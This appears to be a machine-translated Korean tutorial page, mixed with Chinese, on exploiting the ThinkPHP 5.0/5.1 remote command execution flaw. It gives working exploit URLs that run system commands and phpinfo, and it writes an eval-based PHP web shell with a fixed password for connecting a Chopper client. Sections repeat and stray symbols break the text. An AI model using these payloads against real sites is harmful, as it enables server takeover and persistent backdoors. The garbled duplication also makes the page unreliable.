> PHP 프레임워크 > ThinkPHP > ThinkPHP 취약점 악용 정보

ThinkPHP 취약점 악용 정보

藏色散人
풀어 주다: 2020-08-31 13:37:53
앞으로
2997명이 탐색했습니다.

다음은 thinkphp프레임워크 튜토리얼 칼럼의 ThinkPHP 취약점 공격에 대한 소개입니다. 도움이 필요한 친구들에게 도움이 되길 바랍니다!

ThinkPHP 취약점 악용 정보

thinkphp_5x_command 실행 취약점

영향을 받는 버전에는 버전 5.0 및 5.1

docker 취약점 환경 소스 코드가 포함됩니다:
https://github.com/vulnspy/thinkphp-5.1<code>https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1로컬 환경 설정:

thinkphp5.0.15+php5.6n+ apache2.0

http://www.thinkphp.cn/donate/download/id/1125.html

원격 명령 실행에 시스템 기능 사용


EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/ thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

phpinfo 함수를 통해 phpinfo() 정보 쓰기


EXP:

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1🎜 🎜쓰기 to shell🎜
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
로그인 후 복사
🎜식칼을 사용하여 연결🎜`🎜http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 비밀번호는 zane🎜🎜http://127.0.0.1/middleware/ thinkphp_5.0.15_full/test.php 비밀번호는 zane🎜`🎜

위 내용은 ThinkPHP 취약점 악용 정보의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:cnblogs.com
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿